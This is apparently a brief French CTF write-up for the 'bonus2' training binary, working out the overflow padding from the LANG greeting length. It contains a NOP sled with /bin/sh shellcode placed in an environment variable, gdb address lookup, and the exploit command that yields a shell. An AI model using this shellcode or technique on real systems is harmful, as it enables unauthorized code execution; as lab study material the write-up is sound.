on remplit les 40 premier bytes de buff avec av[1] puis les 32 suivants avec av[2]  (tmp[76])
en fonction de la langue dans l'env, on doit ajuster le padding de l'overwite de $eip ("hello " ou " Goedemiddag!" ou "Hyvää päivää ")
une fois dans greetuser :
buff[88] - taille du mot (17 ou 14 ou 7) - av[1] - av[2]
exemple avec hello : 88 - 7 - 76 = 5 (pas d'overflow  )
ex "Hyvää päivää " : 88 - 17- 76 = - 5 (overflow)

export `python -c 'print "LANG=nl" + "\x90" * 1000 + "\x31\xc9\xf7\xe9\x51\x04\x0b\xeb\x08\x5e\x87\xe6\x99\x87\xdc\xcd\x80\xe8\xf3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x2f\x73\x68"'`

find the add of LANG in gdb
gdb-peda$ x/20s *((char**)environ)
0xbffffb49:		 "LANG=nl\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\
[...]

./bonus2 `python -c 'print "A" * 200'` `python -c 'print "B" * 23 + "\xbf\xff\xfc\xd0"[::-1]'`
Goedemiddag! AAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBAAAACCCCD
$
